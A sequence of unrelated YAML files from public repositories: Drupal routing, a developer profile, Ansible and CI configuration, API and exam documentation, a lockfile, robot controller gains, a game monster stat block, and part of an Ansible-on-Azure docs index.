path: '/features/api/detect/{name}'
defaults:
_controller: '\Drupal\features_ui\Controller\FeaturesUIController::detect'
requirements:
_permission: 'administer site configuration'
|
drupal/modules/features/modules/features_ui/features_ui.routing.yml
|
uid: advocates.tim-heuer
name: <NAME>
metadata:
title: <NAME> - Cloud Advocate
description: Home page for <NAME>, a Microsoft Cloud Advocate
remarks: |
## Bio
I've been working as a software developer ever since my studies in law. O_O – hey, tech paid the bills more than law was going to accumulate them. I've worked for Microsoft for 12 years and always in developer space, I absolutely love software development. Prior to Microsoft I wrote software for healthcare systems and interop systems (remember Site Server anyone?) to bridge brick-and-mortar AS400 systems to the Interwebs to sell their goods online. I've primarily worked on front-end technologies and specialized in UI frameworks with my time working on the WPF, Silverlight, Windows Phone and Windows teams being the lead for the XAML framework. I love the challenges cross-platform brings to developers and how the cloud is a common denominator for mobile! I'm very excited to help .NET developers building mobile apps be successful on Azure!
In my spare time, I've become addicted to cycling and can usually be found trying to ride off whatever food I just ate in hopes to be able to eat some more. While I'm not in school anymore, I'm constantly being educated on what the cool kids are doing through my son and daughter and escaping with my wife whenever we can.
## Skills
* .NET / C#
* Xamarin
* XAML
## Code, talks, and stuff
* [Alexa.NET](https://github.com/timheuer/alexa-skills-dotnet) - A .NET Core SDK to help with interacting with Alexa conversations.
* [Callisto](https://github.com/timheuer/callisto) - A UI toolkit for Universal Windows Platform applications.
* [TagLib# (portable)](https://github.com/timheuer/taglib-sharp-portable) - Making the TagLib# library available for anyone (man, I need to move this to .NET Standard!)
* [Talks on Channel 9](https://channel9.msdn.com/Events/Speakers/Tim-Heuer) - A collection of some presentations on [Channel 9](http://channel9.msdn.com)
* [Build 2017 UI Recap](http://timheuer.com/blog/archive/2017/05/15/build-2017-recap-windows-ui-xaml.aspx)
tagline: .NET / Xamarin
image:
alt: "<NAME> Cloud Advocate"
src: media/profiles/tim-heuer.png
twitter: https://twitter.com/timheuer
github: https://github.com/timheuer
blog: http://timheuer.com/blog/
instagram: https://www.instagram.com/timheuer
stackoverflow: https://stackoverflow.com/users/705/tim-heuer
linkedin: https://linkedin.com/in/timheuer
location:
display: Redmond, Washington, United States
lat: 47.679194
long: -122.153322
|
advocates/tim-heuer.yml
|
---
# defaults file for getenvoy
getenvoy_ver: 0.4.1
getenvoy_mirror: https://github.com/tetratelabs/getenvoy/releases/download
getenvoy_parent_install_dir: /usr/local
getenvoy_os: linux
getenvoy_arch: amd64
#getenvoy_install:
# - version: 1.14.2
# - version: 1.17.1
#getenvoy_link:
# version: 1.14.2
getenvoy_checksums:
# https://github.com/tetratelabs/getenvoy/releases/download/v0.2.0/checksums.txt
'0.2.0':
# https://github.com/tetratelabs/getenvoy/releases/download/v0.2.0/getenvoy_0.2.0_Darwin_x86_64.tar.gz
Darwin_x86_64: sha256:f08438b83d3059862b50f2a91af6a38c2637433822c8fe2b6a12806d423f3087
# https://github.com/tetratelabs/getenvoy/releases/download/v0.2.0/getenvoy_0.2.0_Linux_i386.tar.gz
Linux_i386: sha256:0b09e8b4ff1d4ad93f8fcaa6d30487316962451c4e9afe8c9e2c058f54413743
# https://github.com/tetratelabs/getenvoy/releases/download/v0.2.0/getenvoy_0.2.0_Linux_x86_64.tar.gz
Linux_x86_64: sha256:afc8fc25d0619f8d07d3cc45fa606bdeae93ef450f90366d1aba08508699b258
# https://github.com/tetratelabs/getenvoy/releases/download/v0.3.1/getenvoy_0.3.1_checksums.txt
'0.3.1':
# https://github.com/tetratelabs/getenvoy/releases/download/v0.3.1/getenvoy_0.3.1_darwin_amd64.tar.gz
darwin_amd64: sha256:769ca6e0a7e2628f5092016aebb70bae8ee69013d3f3027b82787c0041758970
# https://github.com/tetratelabs/getenvoy/releases/download/v0.3.1/getenvoy_0.3.1_darwin_arm64.tar.gz
darwin_arm64: sha256:3955c290c5093d10a81fa57f78954500d2c80d001992f08e77aa778075a09009
# https://github.com/tetratelabs/getenvoy/releases/download/v0.3.1/getenvoy_0.3.1_linux_amd64.tar.gz
linux_amd64: sha256:3cc86e5d01e66692d5d7c6a704a91bca7ae4e8bfac5679fcbb843552c95a19e6
# https://github.com/tetratelabs/getenvoy/releases/download/v0.3.1/getenvoy_0.3.1_linux_arm64.tar.gz
linux_arm64: sha256:5a8016b311bc6febd0cb8bfc1de9fea3cb5e5e71e844c9f9304e4dd6dba647c0
# https://github.com/tetratelabs/getenvoy/releases/download/v0.4.1/getenvoy_0.4.1_checksums.txt
'0.4.1':
# https://github.com/tetratelabs/getenvoy/releases/download/v0.4.1/getenvoy_0.4.1_darwin_amd64.tar.gz
darwin_amd64: sha256:f9ad59181474a6fdc5ba1988bd3d3523147a02994f9279aeb57158458db22a09
# https://github.com/tetratelabs/getenvoy/releases/download/v0.4.1/getenvoy_0.4.1_darwin_arm64.tar.gz
darwin_arm64: sha256:79624969b0129a68907bd1281718d05027bbce008189c34dac2577f266ec5bc0
# https://github.com/tetratelabs/getenvoy/releases/download/v0.4.1/getenvoy_0.4.1_linux_amd64.tar.gz
linux_amd64: sha256:98480917e80413b5b9886c30668aa80d7685c7972039d0aec864792521730227
# https://github.com/tetratelabs/getenvoy/releases/download/v0.4.1/getenvoy_0.4.1_linux_arm64.tar.gz
linux_arm64: sha256:21744a928728aec0ad8c5ce4026f3bff56d9bfb84e849f9e8a2460b56c6cb046
|
defaults/main.yml
|
uid: "com.azure.messaging.eventhubs.models.ReceiveOptions.setOwnerLevel*"
fullName: "com.azure.messaging.eventhubs.models.ReceiveOptions.setOwnerLevel"
name: "setOwnerLevel"
nameWithType: "ReceiveOptions.setOwnerLevel"
members:
- uid: "com.azure.messaging.eventhubs.models.ReceiveOptions.setOwnerLevel(java.lang.Long)"
fullName: "com.azure.messaging.eventhubs.models.ReceiveOptions.setOwnerLevel(Long priority)"
name: "setOwnerLevel(Long priority)"
nameWithType: "ReceiveOptions.setOwnerLevel(Long priority)"
summary: "Sets the `ownerLevel` value on this receive operation. When populated, the level indicates that the receive operation is intended to be the only reader of events for the requested partition and associated consumer group. To do so, this receive operation will attempt to assert ownership over the partition; in the case where there is more than one exclusive receive operation for the same partition/consumer group pair, the one having a larger <xref uid=\"com.azure.messaging.eventhubs.models.ReceiveOptions.getOwnerLevel()\" data-throw-if-not-resolved=\"false\" data-raw-source=\"ReceiveOptions#getOwnerLevel()\"></xref> value will \"win\".\n\nWhen an exclusive receive operation is used, those receive operations which are not exclusive or which have a lower priority will either not be allowed to be created. If they already exist, will encounter an exception during the next attempted operation."
parameters:
- description: "The priority associated with an exclusive receive operation; for a non-exclusive receive\n operation, this value should be <code>null</code>."
name: "priority"
type: "<xref href=\"java.lang.Long?alt=java.lang.Long&text=Long\" data-throw-if-not-resolved=\"False\" />"
syntax: "public ReceiveOptions setOwnerLevel(Long priority)"
returns:
description: "The updated <xref uid=\"com.azure.messaging.eventhubs.models.ReceiveOptions\" data-throw-if-not-resolved=\"false\" data-raw-source=\"ReceiveOptions\"></xref> object."
type: "<xref href=\"com.azure.messaging.eventhubs.models.ReceiveOptions?alt=com.azure.messaging.eventhubs.models.ReceiveOptions&text=ReceiveOptions\" data-throw-if-not-resolved=\"False\" />"
type: "method"
metadata: {}
package: "com.azure.messaging.eventhubs.models"
artifact: com.azure:azure-messaging-eventhubs:5.6.0
|
docs-ref-autogen/com.azure.messaging.eventhubs.models.ReceiveOptions.setOwnerLevel.yml
|
title: Programming in C#
metadata:
title: 'Exam 70-483: Programming in C#'
description: 'Exam 70-483: Programming in C#'
uid: exam.70-483
displayName: 70-483
summary: |+
<div><font color='red'><strong>Este exame foi reformado em 31 de janeiro de 2021. Para obter as opções disponíveis atualmente, consulte a página <a href='/learn/certifications/browse/?resource_type=examination'> Navegue pela página de Certificações e Exames</a>.<br/><br/></strong></font></div>
Os candidatos a este exame devem possuir pelo menos um ano de experiência em programação de lógica de aplicativo/negócio essencial para diversos tipos de aplicativos e plataformas de hardware/software usando C#.
Os candidatos também devem ter uma compreensão ampla do seguinte:
- Gerenciamento de fluxo e eventos de programa
- Programação assíncrona e threading
- Validação de dados e trabalhar com coleções de dados, incluindo LINQ
- Lidar com erros e exceções
- Trabalhar com matrizes e coleções
- Trabalhar com variáveis, operadores e expressões
- Trabalhar com classes e métodos
- Declarações de decisão e iteração
<div style='font-weight: bold;'><br/>Note: Existem atualizações de exame efetivas a partir 14 de dezembro de 2017. Para saber mais sobre essas alterações e como elas afetam as habilidades medidas, baixe e leia o documento de alteração do Exame 483.</div>
subTitle: Os candidatos a este exame devem possuir pelo menos um ano de experiência em programação de lógica de aplicativo/negócio essencial para diversos tipos de aplicativos e plataformas de hardware/software usando C#.
iconUrl: /media/learn/certification/badges/certification-exam.svg
pdfDownloadUrl: https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4tiMh
practiceTestUrl: https://www.mindhub.com/70-483-Programming-in-C-p/mu-70-483_p.htm?utm_source=microsoft&utm_medium=certpage&utm_campaign=msofficialpractice
locales:
- en
- zh-cn
- zh-tw
- fr
- de
- ja
- pt-br
levels:
- intermediate
skills:
- Gerenciar fluxo de programa (25-30%)
- Criar e usar tipos (25-30%)
- Depurar aplicativos e implementar segurança (25-30%)
- Implementar acesso aos dados (25-30%)
retirementDate: 01/31/2021
roles:
- developer
products:
- vs
courses:
- uid: course.20483
relatedCertifications:
- related:
uid: certification.mcsa-universal-windows-platform
- related:
uid: certification.mcsa-web-applications-certification
resources:
- title: Exam Replay
description: Veja duas grandes ofertas para ajudar a aumentar suas chances de sucesso.
href: ../deals.md
- title: Painel de certificação
description: Revise e gerencie seus compromissos, certificados e transcrições agendados.
href: https://www.microsoft.com/learning/dashboard.aspx
- title: Solicitar acomodações
description: Saiba mais sobre a solicitação de uma acomodação para realizar o seu exame.
href: ../request-accommodations.md
- title: Políticas de exames e perguntas frequentes
description: Revise e gerencie seus compromissos, certificados e transcrições agendados.
href: ../certification-exam-policies.md
|
learn-certs-pr/exams/70-483.yml
|
name: CI

# Controls when the action will run. Triggers the workflow on push or pull request
# events but only for the master/develop branch families.
on:
  push:
    branches:
      - master
      - develop
      - develop-**
  pull_request:
    branches:
      - master
      - develop
      - develop-**

env:
  LANG: en_US.UTF-8
  BSDiff_WORKSPACE: "BSDiff.xcworkspace"
  BSDiff_PROJECT: "BSDiff.xcodeproj"

# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  Cocoapods_Lint:
    runs-on: macos-10.15
    steps:
      - uses: actions/checkout@v2
        with:
          ref: ${{ github.sha }}
      - name: cocoapods_lint
        run: pod lib lint --allow-warnings --verbose

  Carthage_Lint:
    runs-on: macos-10.15
    steps:
      - uses: actions/checkout@v2
        with:
          ref: ${{ github.sha }}
      - name: carthage_lint
        run: |
          # Workaround for Carthage builds under Xcode 12 (excludes arm64 simulator slice).
          export XCODE_XCCONFIG_FILE=$PWD/fix_carthage_xcode_12.xcconfig
          carthage build --no-skip-current

  Build_Examples:
    runs-on: macos-10.15
    strategy:
      matrix:
        sdk: [iOS13.3, iOS13.4]
        include:
          - sdk: iOS13.3
            developer_dir: /Applications/Xcode_11.3.1.app
            destination: OS=13.3,name=iPhone 11 Pro Max
            scheme: BSDiffExample
          - sdk: iOS13.4
            developer_dir: /Applications/Xcode_11.4.app
            destination: OS=13.4.1,name=iPhone 11 Pro Max
            scheme: BSDiffExample
    steps:
      - uses: actions/checkout@v2
        with:
          ref: ${{ github.sha }}
      - name: bundle_install
        run: |
          xcrun simctl list
          bundle install
          pod install
      - name: build_examples
        env:
          DEVELOPER_DIR: ${{ matrix.developer_dir }}
        run: |
          set -o pipefail
          xcodebuild -version -sdk
          xcodebuild build -workspace "${{ env.BSDiff_WORKSPACE }}" -scheme "${{ matrix.scheme }}" -destination "${{ matrix.destination }}" ONLY_ACTIVE_ARCH=NO CODE_SIGNING_REQUIRED=NO | bundle exec xcpretty -c;

  Unit_Tests:
    runs-on: macos-10.15
    strategy:
      matrix:
        sdk: [iOS13.3]
        include:
          - sdk: iOS13.3
            developer_dir: /Applications/Xcode_11.3.1.app
            destination: OS=13.3,name=iPhone 11 Pro Max
            scheme: BSDiff
    steps:
      - uses: actions/checkout@v2
        with:
          ref: ${{ github.sha }}
      - name: bundle_install
        run: |
          xcrun simctl list
          bundle install
      - name: unit_tests
        env:
          DEVELOPER_DIR: ${{ matrix.developer_dir }}
        run: |
          set -o pipefail
          # ONLY_ACTIVE_ARCH was previously passed twice (=NO then =YES) on the
          # same command line; xcodebuild silently used the last one (=YES), so
          # keep a single explicit =YES to build only the simulator's arch.
          xcodebuild build build-for-testing -project "${{ env.BSDiff_PROJECT }}" -scheme "${{ matrix.scheme }}" -destination "${{ matrix.destination }}" -configuration Debug CODE_SIGNING_REQUIRED=NO GCC_INSTRUMENT_PROGRAM_FLOW_ARCS=YES GCC_GENERATE_TEST_COVERAGE_FILES=YES ONLY_ACTIVE_ARCH=YES | bundle exec xcpretty -c;
          xcodebuild analyze test-without-building -project "${{ env.BSDiff_PROJECT }}" -scheme "${{ matrix.scheme }}" -destination "${{ matrix.destination }}" -configuration Debug CODE_SIGNING_REQUIRED=NO GCC_INSTRUMENT_PROGRAM_FLOW_ARCS=YES GCC_GENERATE_TEST_COVERAGE_FILES=YES ONLY_ACTIVE_ARCH=YES | bundle exec xcpretty -c;
      - uses: codecov/codecov-action@v1
|
.github/workflows/ci.yml
|
---
- description:
buttons: submit,cancel
label: Rubrik - Select SLA Domain
blueprint_id:
dialog_tabs:
- description:
display: edit
label: SLA Domain
display_method:
display_method_options:
position: 0
dialog_groups:
- description:
display: edit
label: SLA Domain
display_method:
display_method_options:
position: 0
dialog_fields:
- name: current_site_label
description:
type: DialogFieldTextBox
data_type: string
notes:
notes_display:
display: edit
display_method:
display_method_options: {}
required: false
required_method:
required_method_options: {}
default_value: ''
values: []
values_method:
values_method_options: {}
options:
:protected: false
label: 'Current Rubrik Site:'
position: 0
validator_type:
validator_rule:
reconfigurable:
dynamic: true
show_refresh_button:
load_values_on_init:
read_only: true
auto_refresh:
trigger_auto_refresh:
visible: true
resource_action:
action:
resource_type: DialogField
ae_namespace: Integration/VMware
ae_class: DynamicLabels
ae_instance: GetCurrentRubrikSite
ae_message:
ae_attributes: {}
- name: current_sla_label
description:
type: DialogFieldTextBox
data_type: string
notes:
notes_display:
display: edit
display_method:
display_method_options: {}
required: false
required_method:
required_method_options: {}
default_value: ''
values: []
values_method:
values_method_options: {}
options:
:protected: false
label: 'Current SLA Domain:'
position: 1
validator_type:
validator_rule:
reconfigurable:
dynamic: true
show_refresh_button:
load_values_on_init:
read_only: true
auto_refresh:
trigger_auto_refresh:
visible: true
resource_action:
action:
resource_type: DialogField
ae_namespace: Integration/VMware
ae_class: DynamicLabels
ae_instance: GetCurrentRubrikSla
ae_message:
ae_attributes: {}
- name: select_rubrik_site
description:
type: DialogFieldDropDownList
data_type:
notes:
notes_display:
display: edit
display_method:
display_method_options: {}
required: true
required_method:
required_method_options: {}
default_value:
values: []
values_method:
values_method_options: {}
options:
:force_multi_value: false
label: 'Select New Rubrik Site:'
position: 2
validator_type:
validator_rule:
reconfigurable:
dynamic: true
show_refresh_button:
load_values_on_init:
read_only: false
auto_refresh: true
trigger_auto_refresh: true
visible: true
resource_action:
action:
resource_type: DialogField
ae_namespace: System
ae_class: Request
ae_instance: QueryConfiguredClusters
ae_message:
ae_attributes: {}
- name: sla_domain_list
description:
type: DialogFieldDropDownList
data_type:
notes:
notes_display:
display: edit
display_method:
display_method_options: {}
required: true
required_method:
required_method_options: {}
default_value:
values: []
values_method:
values_method_options: {}
options:
:force_multi_value: false
label: 'Select New SLA Domain:'
position: 3
validator_type:
validator_rule:
reconfigurable:
dynamic: true
show_refresh_button: false
load_values_on_init: true
read_only: false
auto_refresh: true
trigger_auto_refresh: true
visible: true
resource_action:
action:
resource_type: DialogField
ae_namespace: Workflows
ae_class: SlaDomains
ae_instance: DropDown_QuerySlaDomains
ae_message:
ae_attributes: {}
|
service_dialogs/Rubrik_-_Select_SLA_Domain.yml
|
lockfileVersion: 5.3
specifiers:
sass: ^1.50.0
dependencies:
sass: 1.50.0
packages:
/anymatch/3.1.2:
resolution: {integrity: sha512-P43ePfOAIupkguHUycrc4qJ9kz8ZiuOUijaETwX7THt0Y/GNK7v0aa8rY816xWjZ7rJdA5XdMcpVFTKMq+RvWg==}
engines: {node: '>= 8'}
dependencies:
normalize-path: 3.0.0
picomatch: 2.3.1
dev: false
/binary-extensions/2.2.0:
resolution: {integrity: sha512-jDctJ/IVQbZoJykoeHbhXpOlNBqGNcwXJKJog42E5HDPUwQTSdjCHdihjj0DlnheQ7blbT6dHOafNAiS8ooQKA==}
engines: {node: '>=8'}
dev: false
/braces/3.0.2:
resolution: {integrity: sha512-b8um+L1RzM3WDSzvhm6gIz1yfTbBt6YTlcEKAvsmqCZZFw46z626lVj9j1yEPW33H5H+lBQpZMP1k8l+78Ha0A==}
engines: {node: '>=8'}
dependencies:
fill-range: 7.0.1
dev: false
/chokidar/3.5.3:
resolution: {integrity: sha512-Dr3sfKRP6oTcjf2JmUmFJfeVMvXBdegxB0iVQ5eb2V10uFJUCAS8OByZdVAyVb8xXNz3GjjTgj9kLWsZTqE6kw==}
engines: {node: '>= 8.10.0'}
dependencies:
anymatch: 3.1.2
braces: 3.0.2
glob-parent: 5.1.2
is-binary-path: 2.1.0
is-glob: 4.0.3
normalize-path: 3.0.0
readdirp: 3.6.0
optionalDependencies:
fsevents: 2.3.2
dev: false
/fill-range/7.0.1:
resolution: {integrity: sha512-qOo9F+dMUmC2Lcb4BbVvnKJxTPjCm+RRpe4gDuGrzkL7mEVl/djYSu2OdQ2Pa302N4oqkSg9ir6jaLWJ2USVpQ==}
engines: {node: '>=8'}
dependencies:
to-regex-range: 5.0.1
dev: false
/fsevents/2.3.2:
resolution: {integrity: sha512-xiqMQR4xAeHTuB9uWm+fFRcIOgKBMiOBP+eXiyT7jsgVCq1bkVygt00oASowB7EdtpOHaaPgKt812P9ab+DDKA==}
engines: {node: ^8.16.0 || ^10.6.0 || >=11.0.0}
os: [darwin]
requiresBuild: true
dev: false
optional: true
/glob-parent/5.1.2:
resolution: {integrity: sha512-AOIgSQCepiJYwP3ARnGx+5VnTu2HBYdzbGP45eLw1vr3zB3vZLeyed1sC9hnbcOc9/SrMyM5RPQrkGz4aS9Zow==}
engines: {node: '>= 6'}
dependencies:
is-glob: 4.0.3
dev: false
/immutable/4.0.0:
resolution: {integrity: sha512-zIE9hX70qew5qTUjSS7wi1iwj/l7+m54KWU247nhM3v806UdGj1yDndXj+IOYxxtW9zyLI+xqFNZjTuDaLUqFw==}
dev: false
/is-binary-path/2.1.0:
resolution: {integrity: sha512-ZMERYes6pDydyuGidse7OsHxtbI7WVeUEozgR/g7rd0xUimYNlvZRE/K2MgZTjWy725IfelLeVcEM97mmtRGXw==}
engines: {node: '>=8'}
dependencies:
binary-extensions: 2.2.0
dev: false
/is-extglob/2.1.1:
resolution: {integrity: sha1-qIwCU1eR8C7TfHahueqXc8gz+MI=}
engines: {node: '>=0.10.0'}
dev: false
/is-glob/4.0.3:
resolution: {integrity: sha512-xelSayHH36ZgE7ZWhli7pW34hNbNl8Ojv5KVmkJD4hBdD3th8Tfk9vYasLM+mXWOZhFkgZfxhLSnrwRr4elSSg==}
engines: {node: '>=0.10.0'}
dependencies:
is-extglob: 2.1.1
dev: false
/is-number/7.0.0:
resolution: {integrity: sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==}
engines: {node: '>=0.12.0'}
dev: false
/normalize-path/3.0.0:
resolution: {integrity: sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==}
engines: {node: '>=0.10.0'}
dev: false
/picomatch/2.3.1:
resolution: {integrity: sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==}
engines: {node: '>=8.6'}
dev: false
/readdirp/3.6.0:
resolution: {integrity: sha512-hOS089on8RduqdbhvQ5Z37A0ESjsqz6qnRcffsMU3495FuTdqSm+7bhJ29JvIOsBDEEnan5DPu9t3To9VRlMzA==}
engines: {node: '>=8.10.0'}
dependencies:
picomatch: 2.3.1
dev: false
/sass/1.50.0:
resolution: {integrity: sha512-cLsD6MEZ5URXHStxApajEh7gW189kkjn4Rc8DQweMyF+o5HF5nfEz8QYLMlPsTOD88DknatTmBWkOcw5/LnJLQ==}
engines: {node: '>=12.0.0'}
hasBin: true
dependencies:
chokidar: 3.5.3
immutable: 4.0.0
source-map-js: 1.0.2
dev: false
/source-map-js/1.0.2:
resolution: {integrity: sha512-R0XvVJ9WusLiqTCEiGCmICCMplcCkIwwR11mOSD9CR5u+IXYdiseeEuXCVAjS54zqwkLcPNnmU4OeJ6tUrWhDw==}
engines: {node: '>=0.10.0'}
dev: false
/to-regex-range/5.0.1:
resolution: {integrity: sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==}
engines: {node: '>=8.0'}
dependencies:
is-number: 7.0.0
dev: false
|
pnpm-lock.yaml
|
joint_state_controller:
type: joint_state_controller/JointStateController
publish_rate: 100
panda_joint_trajectory_controller:
type: velocity_controllers/JointTrajectoryController
joints:
- panda_joint1
- panda_joint2
- panda_joint3
- panda_joint4
- panda_joint5
- panda_joint6
- panda_joint7
gains:
panda_joint1: { p: 10000.0, i: 1.0, d: 1000.0, i_clamp: 10 }
panda_joint2: { p: 100.0, i: 0.1, d: 20.0, i_clamp: 1.0 }
panda_joint3: { p: 500.0, i: 0.01, d: 10.0, i_clamp: 0.1 }
panda_joint4: { p: 400.0, i: 0.0, d: 10.0, i_clamp: 0.0 }
panda_joint5: { p: 6.5, i: 0.0, d: 0.01, i_clamp: 0.0 }
panda_joint6: { p: 8.0, i: 0.0, d: 0.01, i_clamp: 0.0 }
panda_joint7: { p: 12.0, i: 0.0, d: 0.1, i_clamp: 0.0 }
constraints:
goal_time: 2.0
panda_joint1: {goal: 0.02}
panda_joint2: {goal: 0.02}
panda_joint3: {goal: 0.02}
panda_joint4: {goal: 0.02}
panda_joint5: {goal: 0.02}
panda_joint6: {goal: 0.02}
panda_joint7: {goal: 0.02}
state_publish_rate: 100
panda_joint1_position_controller:
type: velocity_controllers/JointPositionController
joint: panda_joint1
pid: {p: 10.0, i: 0, d: 0.1, i_clamp: 0}
panda_joint2_position_controller:
type: velocity_controllers/JointPositionController
joint: panda_joint2
pid: {p: 100.0, i: 0, d: 1.0, i_clamp: 0}
panda_joint3_position_controller:
type: velocity_controllers/JointPositionController
joint: panda_joint3
pid: {p: 500.0, i: 0, d: 0.3, i_clamp: 0}
panda_joint4_position_controller:
type: velocity_controllers/JointPositionController
joint: panda_joint4
pid: {p: 100.0, i: 0.0, d: 0.1}
panda_joint5_position_controller:
type: velocity_controllers/JointPositionController
joint: panda_joint5
pid: {p: 6.5, i: 0.0, d: 0.01}
panda_joint6_position_controller:
type: velocity_controllers/JointPositionController
joint: panda_joint6
pid: {p: 8.0, i: 0.0, d: 0.01}
panda_joint7_position_controller:
type: velocity_controllers/JointPositionController
joint: panda_joint7
pid: {p: 12.0, i: 0.0, d: 0.1}
panda_joint1_velocity_controller:
type: velocity_controllers/JointVelocityController
joint: panda_joint1
panda_joint2_velocity_controller:
type: velocity_controllers/JointVelocityController
joint: panda_joint2
panda_joint3_velocity_controller:
type: velocity_controllers/JointVelocityController
joint: panda_joint3
panda_joint4_velocity_controller:
type: velocity_controllers/JointVelocityController
joint: panda_joint4
panda_joint5_velocity_controller:
type: velocity_controllers/JointVelocityController
joint: panda_joint5
panda_joint6_velocity_controller:
type: velocity_controllers/JointVelocityController
joint: panda_joint6
panda_joint7_velocity_controller:
type: velocity_controllers/JointVelocityController
joint: panda_joint7
panda_hand_controller:
type: velocity_controllers/JointTrajectoryController
joints:
- panda_finger_joint1
- panda_finger_joint2
gains:
panda_finger_joint1: { p: 5, d: 3.0, i: 0, i_clamp: 1 }
panda_finger_joint2: { p: 5, d: 1.0, i: 0, i_clamp: 1 }
state_publish_rate: 25
|
param/panda_control.yaml
|
name: <NAME>
slug_name: rath-modar
challenge_rating: 6.0
experience: 2300
size: Medium
type: humanoid
subtype: human
alignment: lawful evil
armor_class: 13
armor_class_type: 16 with mage armor
hit_points: 71
hit_dice: 11d8+22
speed: 30 ft.
strength: 11
dexterity: 16
constitution: 14
intelligence: 18
wisdom: 14
charisma: 10
saving_throws: Int +7, Wis +5
skills: Arcana +7, Deception +3, Insight +5, Stealth +6
senses:
languages: Common, Draconic, Infernal, Primordial, Thayan
damage_resistances:
damage_immunities:
damage_vulnerabilities:
condition_immunities:
special_abilities:
- name: Special Equipment
description: Rath has a staff of fire, and scrolls of dimension door, feather fall, and fireball.
actions:
- name: Quarterstaff
description: "Melee Weapon Attack: +4 to hit, reach 5 ft., one target. Hit: 4 (1d8) bludgeoning damage.\n\n**Reactions**"
- name: Illusory Self (Recharges on a Short or Long Rest)
description: When a creature Rath can see makes an attack roll against him, he can interpose an illusory duplicate between the attacker and him. The attack automatically misses Rath, then the illusion dissipates.
spell_casting:
- title: Spellcasting
top_description: 'Rath is an 11th-level spellcaster who uses Intelligence as his spellcasting ability (spell save DC 15, +7 to hit with spell attacks). Rath has the following spells prepared from the wizard spell list:'
bottom_description: ''
spell_list:
- title: Cantrips (at will)
spells:
- name: fire bolt
slug_name: fire-bolt
- name: minor illusion
slug_name: minor-illusion
- name: prestidigitation
slug_name: prestidigitation
- name: shocking grasp
slug_name: shocking-grasp
- title: 1st level (4 slots)
spells:
- name: chromatic orb
slug_name: chromatic-orb
- name: color spray
slug_name: color-spray
- name: mage armor
slug_name: mage-armor
- name: magic missile
slug_name: magic-missile
- title: 2nd level (3 slots)
spells:
- name: detect thoughts
slug_name: detect-thoughts
- name: mirror image
slug_name: mirror-image
- name: phantasmal force
slug_name: phantasmal-force
- title: 3rd level (3 slots)
spells:
- name: counterspell
slug_name: counterspell
- name: fireball
slug_name: fireball
- name: major image
slug_name: major-image
- title: 4th level (3 slots)
spells:
- name: confusion
slug_name: confusion
- name: greater invisibility
slug_name: greater-invisibility
- title: 5th level (2 slots)
spells:
- name: mislead
slug_name: mislead
- name: seeming
slug_name: seeming
- title: 6th level (1 slot)
spells:
- name: globe of invulnerability
slug_name: globe-of-invulnerability
|
data/monsters/rath-modar.yaml
|
title: Documentatie over Ansible op Azure
summary: Leer Ansible gebruiken om cloudinrichting, configuratiebeheer en toepassingsimplementaties te automatiseren.
metadata:
title: Documentatie over Ansible op Azure
description: Leer Ansible gebruiken om cloudinrichting, configuratiebeheer en toepassingsimplementaties te automatiseren.
services: azure
ms.service: ansible
ms.topic: landing-page
author: TomArcherMsft
ms.author: tarcher
ms.date: 09/11/2019
ms.openlocfilehash: ccdf9055fbdb72f0f0059d9bfe27bee41952446e
ms.sourcegitcommit: bb65043d5e49b8af94bba0e96c36796987f5a2be
ms.translationtype: HT
ms.contentlocale: nl-NL
ms.lasthandoff: 10/16/2019
ms.locfileid: "72389008"
landingContent:
- title: Over Ansible op Azure
linkLists:
- linkListType: overview
links:
- text: Over Ansible op Azure
url: ansible-overview.md
- linkListType: reference
links:
- text: Versies en functies
url: ./ansible-matrix.md
- text: Alle modules voor Azure
url: https://docs.ansible.com/ansible/latest/modules/list_of_cloud_modules#azure
- title: Ansible installeren en configureren
linkLists:
- linkListType: quickstart
links:
- text: Ansible-oplossingssjabloon implementeren in CentOS
url: ansible-deploy-solution-template.md
- text: Ansible installeren in virtuele Linux-machines
url: /azure/virtual-machines/linux/ansible-install-configure
- text: Playbooks uitvoeren in Cloud Shell
url: ansible-run-playbook-in-cloudshell.md
- linkListType: tutorial
links:
- text: Een dynamische voorraad configureren
url: ansible-manage-azure-dynamic-inventories.md
- linkListType: download
links:
- text: Visual Studio Code-extensie voor Ansible
url: https://marketplace.visualstudio.com/items?itemName=vscoss.vscode-ansible
- title: Virtuele Linux-machines beheren
linkLists:
- linkListType: quickstart
links:
- text: Virtuele Linux-machines configureren
url: /azure/virtual-machines/linux/ansible-create-vm?toc=%2Fen-us%2Fazure%2Fansible%2Ftoc.json&bc=%2Fen-us%2Fazure%2Fbread%2Ftoc.json
- text: Virtuele Linux-machines beheren
url: /azure/virtual-machines/linux/ansible-manage-linux-vm?toc=%2Fen-us%2Fazure%2Fansible%2Ftoc.json&bc=%2Fen-us%2Fazure%2Fbread%2Ftoc.json
- text: Maken vanuit een galerie met gedeelde installatiekopieën
url: ansible-vm-create-from-shared-generalized-image.md
- title: Schaalsets voor virtuele machines beheren
linkLists:
- linkListType: tutorial
links:
- text: Schaalsets voor virtuele machines configureren
url: ansible-create-configure-vmss.md
- text: Toepassingen implementeren in schaalsets voor virtuele machines
url: ansible-deploy-app-vmss.md
- text: De schaal van een schaalset voor virtuele machines automatisch aanpassen
url: ansible-auto-scale-vmss.md
- text: Aangepaste installatiekopie bijwerken
url: ansible-vmss-update-image.md
- text: Maken vanuit een galerie met gedeelde installatiekopieën
url: ansible-vm-create-from-shared-generalized-image.md
- title: Virtuele netwerken beheren
linkLists:
- linkListType: tutorial
links:
- text: Peering configureren
url: ansible-vnet-peering-configure.md
- text: Routetabellen configureren
url: ansible-create-configure-route-table.md
- title: AKS beheren
linkLists:
- linkListType: tutorial
links:
- text: AKS-clusters configureren
url: ansible-create-configure-aks.md
- text: Azure CNI-netwerken configureren
url: ansible-aks-configure-cni-networking.md
- text: Kubenet-netwerken configureren
